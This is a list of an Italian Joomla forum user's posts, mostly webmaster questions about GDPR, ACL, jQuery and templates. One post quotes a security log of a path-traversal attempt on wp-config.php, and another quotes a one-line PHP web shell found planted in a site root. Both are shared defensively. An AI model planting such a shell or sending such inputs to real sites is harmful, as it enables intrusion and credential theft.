Visualizza post

Questa sezione ti permette di visualizzare tutti i post inviati da questo utente. N.B: puoi vedere solo i post relativi alle aree dove hai l'accesso.


Topics - giusebos

Pagine: [1] 2 3 4 5
1
Joomla! 3 / Su GDPR video con info utili
« il: 12 Lug 2018, 15:39:38 »
Il video del link contiene informazioni molto utili visto la confusione che ancora oggi regna in tema di GDPR

Dopo avermi letto e visto centinaia di pagine e video, credo che questo video contenga in pillole e con un linguaggio chiaro cosa bisogna fare con la nuova normativa.

https://www.youtube.com/watch?v=Lo51hm3xENY

2
Per chi volesse approfondire bootstrap su questo canale youtube dei chiarissimi esempi

questa la playlist

https://www.youtube.com/watch?v=6spqHfiCwtY&list=PLG15PAKlF52sWSimPF2SO7uhMf2z9PnGP

Questi video affiancati alle istruzioni per creare un template che troverete nel wiki di questo forum vi permetterenno di realizzare bellissimi template limitati solo dalla vostra fantasia.


3
oggi ricevo la consueta newsletter di joomla.it con le informazioni degli aggiornamenti e soluzione a un problema. C'è anche un articolo intitolato:

Fabrik: l’estensione per creare web application o gestionali web

ottimo dico, una nuova guida su Fabrik, il titolo poi parla di gestionale... ci sarà da imparare sicuramente!
Purtroppo sono rimasto deluso da questo articolo che non aggiungeva e non insegnava niente su Fabrik, ne elencava doti, pregi, qualità (nessun difetto).

Il classico articolo sul nulla ma pura tecnica pubblicitaria, quello che in gergo si chiama pubbliredazionale, una tecnica che traveste una pubblicità in un articolo.

Come potrete leggere e constatare l'articolo è di una inutilità unica, serve solo a pubblicizzare una pagina web con l'attività di chi scrive, il sig Leonardo Mecca (sarà un utente del forum?)

Ora questi trucchetti da quattro-soldi per farsi pubblicità non mi piacciono, l'articolo è stato scritto in un luogo designato alla conoscenza e non per auto-promuoversi... avesse almeno avuto il buon senso di lasciare una guida, anche piccola, avrebbe dato un altro messaggio, invece io mi sento preso per il culo da l'ennesimo furbo del forum,  genio del marketing creativo.

QUINDI
Se anche voi volete farvi pubblicità, auto-promovendo la vostra attività, con un bel link al sito, sapete che potete farlo.
E' un ottima occasione da non perdere sapendo che nessun backlink viene fuori dal forum se non si superano 800 interventi.

Per ultimo, i miei più sinceri complimenti a chi ha avallato la pubblicazione di questa presa per il culo.

Buona giornata a tutti.

qui l'articolo:
http://www.joomla.it/notizie/8858-fabrik-l-estensione-per-creare-web-application-o-gestionali-web.html

4
Joomla! 3 / F.A.Q. frequently asked questions su Joomla 3.x
« il: 17 Apr 2018, 16:52:58 »
Volevo redarre una lista con risposte alle domande più frequenti che vengono poste su joomla 3.
Secondo voi quali sono?
Mi aiutate nel redarre le domande?

5
Secondo voi è possibile inserire le costanti di una lingua dentro un modulo personalizzato HTML.


Inserendo questo modulo in una pagine e nelle sue antagoniste tradotte, vorrei che le stringhe delle costanti fossero tradotte nella lingua dell'articolo.


Ho provato ad inserire questa stringa nel modulo personalizzato, ma nel frontend vedo che la stringa è commentata e quindi non visibile



Codice: [Seleziona]
<div><?php echo JText::_("JNO"); ?></div>





6
è cambiato qualcosa sulla configurazione di questo server (quello dove è installato SMF per gestire il forum di joomla.it) ?
Sempre più spesso ad ogni nuova pagina si presenta una pagina pinca con l'errore
502 Bad Gateway

7
Avendo l'esigenza di far modificare il contenuto di alcuni moduli HTML (personalizzati) da un gruppo specifico, ho eseguito tutta quella serie di operazioni sulle ACL, ovvero:

  • creo gruppo.
  • lo rendo figlio di Pubblico.
  • in impostazione globale di joomla al gruppo imposto i permessi di amministratore come Consentito.
  • inserisco gli user nel gruppo.
  • nella configurazione dei moduli, in opzioni>>permessi assegno per quel gruppo la possibilità di avere accesso ad interfaccia amministrativa.
  • infine modulo per modulo, in permessi assegno sempre per lo stesso gruppo  la possibilità di modifica e modifica stato.
Tutto funziona alla perfezione e per chi volesse approfondire la guida è questa:
http://www.joomla.it/articoli-community-16-e-17-tab/5544-joomla-acl-configurare-acl-back-end.html


Il mio problema:
Ero convinto che l'utente di quel gruppo potesse vedere solo i moduli in cui gli è permesso fare quelle modifiche, invece li vedo tutti, e anche se disabilitati e quindi inaccessibili preferirei non vederli.
Aggiungo anche di ricordare di averlo fatto in passato, ma forse ricordo male?
Forse non è possibile nei moduli HTML perchè nelle impostazioni ACL non esiste la voce "acesso interfaccia amministrativa"?

8
Sviluppo / ACL su componente sprovvisto e override
« il: 27 Mar 2017, 12:04:49 »
il componente OSmetaFree è sprovvisto di controlli ACL, così seguendo questa guida
https://docs.joomla.org/J3.x:Developing_an_MVC_Component/Adding_ACL
e aggiungendo il codice indicato ne ho integrato la funzione.

Mi chiedevo se queste tipo di modifiche si possono fare con un override dentro la cartella /tuo_template/html per evitare che al primo aggiornamento vengano sovrascritti i file editati.

Il dubbio nasce dal fatto che di solito un override lo si fa per esigenze "estetiche" o di "ordine", ma non ho mai letto nulla riguardo all'aggiunta di una funzione.

Per la verità potevo anche fare un test, ma come al solito ho il fiato sul collo e sempre mille cose da fare e magari qualcuno può rispondermi semplicemente con un no o un si.

Grazie.

9
Sviluppo / Posizione modulo a tempo
« il: 18 Ago 2016, 18:25:10 »
Ho l'esigenza di visualizzare per alcuni secondi un modulo html, così visto che nella jed non ho trovato niente del genere, mi sono orientato su uno script jquery:

Codice: [Seleziona]
<!DOCTYPE HTML>
<html lang="">
<head>
<meta charset="UTF-8">
<title>Nome do Documento</title>
<link rel="stylesheet" type="text/css" href="css/estilo.css">
<script
  src="https://code.jquery.com/jquery-1.12.4.js"
  integrity="sha256-Qw82+bXyGq6MydymqBxNPYTaUXXq7c8v3CwiYwLLNXU="
  crossorigin="anonymous"></script>
<script>
setTimeout(function() {
$('#mydiv').fadeOut('fast');
}, 1000); // <-- time in milliseconds
</script>
</head>

<body>

 <div id="mydiv">contenuto contenuto contenuto contenuto contenuto</div>
</body>
</html>

Testando con successo il corretto funzionamento, costruendo una semplice pagina in html (quella del codice sopra), procedo per applicarlo al template che uso, ma purtroppo di funzionare non ne vuol sapere, il testo rimane li impassibile anzichè svanire nel nulla come nella semplice pagina in html.

Semplifico un pò le cose per vedere se è una questione di "div" o una questione di conflitto jquery, quindi inserisco dopo il body la stringa

Codice: [Seleziona]
<div id="mydiv">contenuto contenuto contenuto contenuto contenuto</div>
e riprovo.
Niente, ancora non va, la frase non sparisce.
Controllo la versione di jquery, ed è constato che è identica a quella della stringa del CDN

Disattivo tutte le chiamate js provenienti da /media/jui rinominando /jui in /_jui e incollo fra i tag head la stringa CDN.

Funziona, ma hanno smesso di funzionare i menù del back-end........

provo anche jqueryeasy ma senza successo

Disabilito (rinominandoli) uno per volta, cercando di andare per esclusione i file:
Codice: [Seleziona]
/media/jui/js/jquery.min.js
/media/jui/js/jquery-noconflict.js
/media/jui/js/jquery-migrate.min.js

nella speranza che jqueryeasy faccia funzionare script e voci di menù del back-end
ma anche questa volta la prova fallisce.

per adesso mi fermo nella speranza di un vostro suggerimento utile alla soluzione.

Grazie

10
C'è un tizio che da ieri, si sta divertendo a giocare al piccolo haker inserendo o tentando di inserire qualche comando nella speranza di effettuare qualche tipo di "conquista" nel sito in firma.
Vorrei informarlo però che non uso wordpress ::) ;D ;D
Codice: [Seleziona]
** PATTERNS MATCHED (possible hack attempts)

* Local File Inclusion $_GET['file'] => ../../../../../../wp-config.php
* Local File Inclusion $_REQUEST['file'] => ../../../../../../wp-config.php


** PAGE / SERVER INFO

*REMOTE_ADDR : 195.154.199.125
*HTTP_USER_AGENT : Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
*REQUEST_METHOD : GET
*QUERY_STRING : file=../../../../../../wp-config.php


** SUPERGLOBALS DUMP (sanitized)

*$_GET DUMP:
Array
(
    [file] => ../../../../../../wp-config.php
)


*$_POST DUMP:
Array
(
)


*$_COOKIE DUMP:
Array
(
)


*$_REQUEST DUMP:
Array
(
    [file] => ../../../../../../wp-config.php
)

Il sopracitato report viene prodotto dal plug in Marco's SQL Injection, un utente e moderatore di questo forum
http://extensions.joomla.org/extension/marco-s-sql-injection

Ciao Marco è tanto che non ti si sente.

11
Il deface per aumentare il ranking, è una tecnica di defacciamento che mira ad aggiungere link esterni al sito che puntano a e-commerce dove si vende merce contraffatta.

Nell'ultimo periodo questo sito bestsky.co si è fatto gioco di molti proprietari di siti fra cui il sottoscritto: mi sono ritrovato nella serp link tipo icagenda.it/2016-Nuovo-Louis-Vuitton-Monogram-alma-satchel-di-trasporto-56%-sconto.htm

E' stato Marine a farmi notare questa cosa, si era messo a giocare con il mio sito con un software per l'analisi SEO. Pensavo di trovare dei nuovi articoli o delle nuove voci di menù, ed invece nulla.

Lo proporro per un encomio solenne al prossimo Joomladay ;D ;D

Inutile poi starvi a dire che joomla e le poche estensioni sono tutte aggiornate.

Da una ricerca ho constatato che i siti hakerati sono moltissimi. Questo tipo di hakeraggio difficilmente lo riconosci se non ti imbatti in un link nella serp che ha come dominio ha quello del tuo sito, ma come pagina una completamente estranea e che ha una estensione htm anzichè html come Joomla.

Se provate a cercare con google "pochette Louis Vuitton", ed altri modelli di borse, noterete un arcobaleno di strani link a siti che nulla hanno a che vedere con borse di alta moda.

La maggiorparte dei siti sono tutti joomla, ma ho trovato anche qualche sito realizzato con wordpress.

Non sono riuscito ancora a dedicare del tempo per capire questi link da dove arrivano, ma da una ricerca del database e nei file non c'è traccia di questi link e nemmeno cercando stringhe codificate in base64.

Questa volta sono io che ho i fantasmi nel sito!

Appena mi libero da un pò di lavoro copio il sito su altro spazio e provo con la carta dell'esclusione eliminando estensione per estensione (che comunque sono poche) fino a rimanere con i soli file core di joomla.

per adesso ho inserito nell'htaccess una regola che riporta i link alla home, anche se non serve a niente almeno non ne trarranno vantaggio questi falsari.

Se avete qualche suggerimento lo accetto volentieri.

Giuseppe

12
Volevo segnalare questo software gratuito per sviluppare template in html basati su bootstrap.
Il software è disponibile per Mac, Windows e linux, nelle versioni a 32 e a 64 bit.

Il software ci consente con poca fatica e nessuna conoscenza di html e css di creare dei template basati su bootstrap, quindi una buona base di partenza per realizzare un template per joomla.

Con delle semplici operazioni di drag and drop, si potranno aggiungere menù colonne riquadri, slider e quant'altro, il tutto utilizzando il framework bootstrap.

Una volta realizzato il template basterà editarlo un poco come descritto nel wiki per avere un bellissimo template responsive

Questo il link dove poter scaricare il software
http://pingendo.com/

13
Devo risolvere un problemino di css su un template, e mi chiedevo se esistesse un estensione per firefox o chrome che potesse fornire questa informazione:

avere l'elenco delle classi utilizzate nella pagina corrente del browser

Grazie

14
Sviluppo / [Risolto] subtitle per voci di menù
« il: 07 Lug 2016, 17:07:39 »
volevo integrare dei subtitle sottotitoli nelle voci del mio template senza voler usare una dei tanti menù preconfezionati come icemegamenù o ckmenù, quindi mi sono messo alla ricerca di come si potesse implementare questa funzione che di solito viene offerta con template che fanno uso di framework tipo gantry, T3, Helix.

Ho un template tutto mio e non ho assolutamente voglia di usare un framework o estensioni che fanno anche molto altro solo per avere questi sottotitoli.

senza contare che se dovessi usare un framework dovrei stare a rifarmi il template.

Trovo questa discussione
http://forum.joomla.org/viewtopic.php?t=866426
che fa riferimento a joomla 3.3, perfetto dico io, quindi prendo il codice e lo inserisco fra i tag php nel template, anzi siccome i tag sono già presenti ci aggiungo le stringhe dell'esempio, avendo così

Codice: [Seleziona]
<?php
defined
('_JEXEC') or die('Restricted access');
$arrTitle explode("||"$item->title); //or $article->title;
$title $arrTitle[0];
$subtitle '';
if (
count($arrTitle) > 1)
   
$subtitle $arrTitle[1];

?>

quindi vado nella mia voce di menù ed aggiungo dopo le due pipe ilo mio subtitle

ad esempio

home||subtitle

Purtroppo non funziona e non sono riuscito a trovare altre informazioni su questa caratteristica.
Forse sbaglio qualcosa, o magari su j3.5 non funziona.

Qualcuno ne sa qualcosa o conosce altri medoti?

Non vorrei fare del sarcasmo, ma sono tentato di scrivere:

Aiuto, qualche anima pia mi aiuti....... ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D
p.s.

aggiungo un immagine che non si sa mai che qualcuno confonda subtitle con submenu, vedi testo Back to Basic


15
Sviluppo / Browser gratuito per sviluppatori e webmaster
« il: 26 Mag 2016, 14:13:30 »
volevo segnalare blisk, un browser basato su cromium liberamente scaricabile per windows, mac e linux specifico per sviluppatori e webmaster, al suo interno un emulatore per schermi mac e dispositivi vari.
https://blisk.io/

alcune caratteristiche
  • Emula completamente cellulari e tablet
  • la URL e di scorrimento di desktop e mobile sono sincronizzati
  • Blisk aggiorna automaticamente le pagine sul cambiamento dei file
  • Debug desktop e mobile con DevTools
  • Blisk funziona con qualsiasi IDE, di linguaggio e framework
  • risoluzione dello schermo emulato
  • rapporto di pixel dispositivo emulato
  • user agent emulato
  • evento di tocco emulato
Dal browser blisk controlla automaticamente la qualità del codice della pagina web.  Lo sviluppatore ottiene così un analisi in tempo reale per tutti i dispositivi.
  • Cattura errori JavaScript
  • Migliorare la velocità di caricamento della pagina
  • Convalida la compatibilità cross browser
  • Traccia le risorse segnalando quelle che non riescono a caricarsi (CSS, font, immagini, ecc)
  • lo strumento ispeziona elemento funziona dentro il dispositivo emulato così da poterne correggere css

16
Ho inserito un piccolo form dentro una finestra modale, il form ha alcuni campi e un pulsante.
I dati vengono salvato in una tabella
Successivamente all'invio viene visualizzato il contenuto all'interno di un elemento "display message" dove ho scritto "record inserito con successo".

Ho anche inserito un pulsante per inserire un nuovo record richiamando lo stesso form.

L'ANOMALIA:
Mentre la prima volta che apro la finestra modale visualizzo il solo form, la seconda volta, ovvero quando dopo aver salvato i dati premo su "INSERISCI NUOVO RECORD", visualizzo il form con la pagina completa, e cioè visualizzando il nome del sito, il modulo login, il menù etc etc


Per la creazione della finestra modale uso JCE Mediabox collegandolo al form attraverso il link della voce di menù, ma ho provato anche ha collegarlo attraverso il link diretto del form ( index.php?option=com_chronoforms5&chronoform=nome_form) senza nessun cambiamento.

Stessa cosa per il link sul pulsante "INSERISCI NUOVO RECORD".

Qualcuno si è mai cimentato nel richiamare più volte lo stesso form nella stessa finestra?

inserisco indirizzo dove sto testando il form
http://formlab.progetto.ovh/inserimento-libri.html

essendo il form compilabile solo dagli utenti register, ho attivato un account per chi volesse testare
user: test
password:test

17
Sicurezza / strano file nella root del sito
« il: 11 Mag 2016, 15:09:06 »
nel root di uno dei siti che gestisco ho trovato un file:
com_contact_info.php

con al suo interno
Codice: [Seleziona]
<?php ($_=@$_GET[c]).@$_($_POST["5f3avg"])?>
per adesso l'ho cancellato un paio di volte, poi però dopo qualche giorno il file si ripresenta

facendo una ricerca non riesco a trovare nessuna informazione. Avete qualche idea di cosa possa fare quella stringa?

18
Vorrei obbligare l'inserimento in maiuscolo nel campo codice fiscale,
se dal punto di vista visivo si risolve con una regola css, la classica:
Codice: [Seleziona]
text-transform: uppercase;
nella realta nel campo del database il codice viene scritto in minuscolo.
Effettuando una ricerca su google trovo qualche soluzione applicando del codice al php.

la mia domanda era se per caso (io non ho trovato niente) c'era qualche impostazione lato database, per intenderci via SQLyog o phpmyadmin che trasformasse ad ogni inserimento in maiuscolo?

Grazie

19
Ciao,
Il mio problema oggi non è proprio tecnico, vi spiego:
Sto realizzando un piccolo semplice form con una anagrafica clienti, ci sono alcuni campi fra cui comune cap e provincia di nascita in cui uso delle dropdown list dove al momento di scegliere la provincia, nella prima dropdown, la seconda, viene popolata con i comuni.

Fra questi utenti c'è nè sono alcuni che non sono italiani, quindi con un luogo di nascita completamente inesistenti nelle liste che posseggo, tuttavia dover inserire tutte le nazione e/o regioni del mondo mi pare eccessivo solo per una quindicina di soggetti esteri, di cui ogni tanto c'è ne sarà qualcuno nuovo.

Vi è mai capitata di gestire una cosa del genere? Come avete risolto o come risolvereste?

Grazie

20
Sto cercando come si chiama tecnicamente (per poi fare ricerche) quel "fenomeno" che fa apparire i contenuti con un fading via via che si scrolla.

Vorrei applicarlo ad un template che sto realizzando.

Grazie

Pagine: [1] 2 3 4 5

Torna su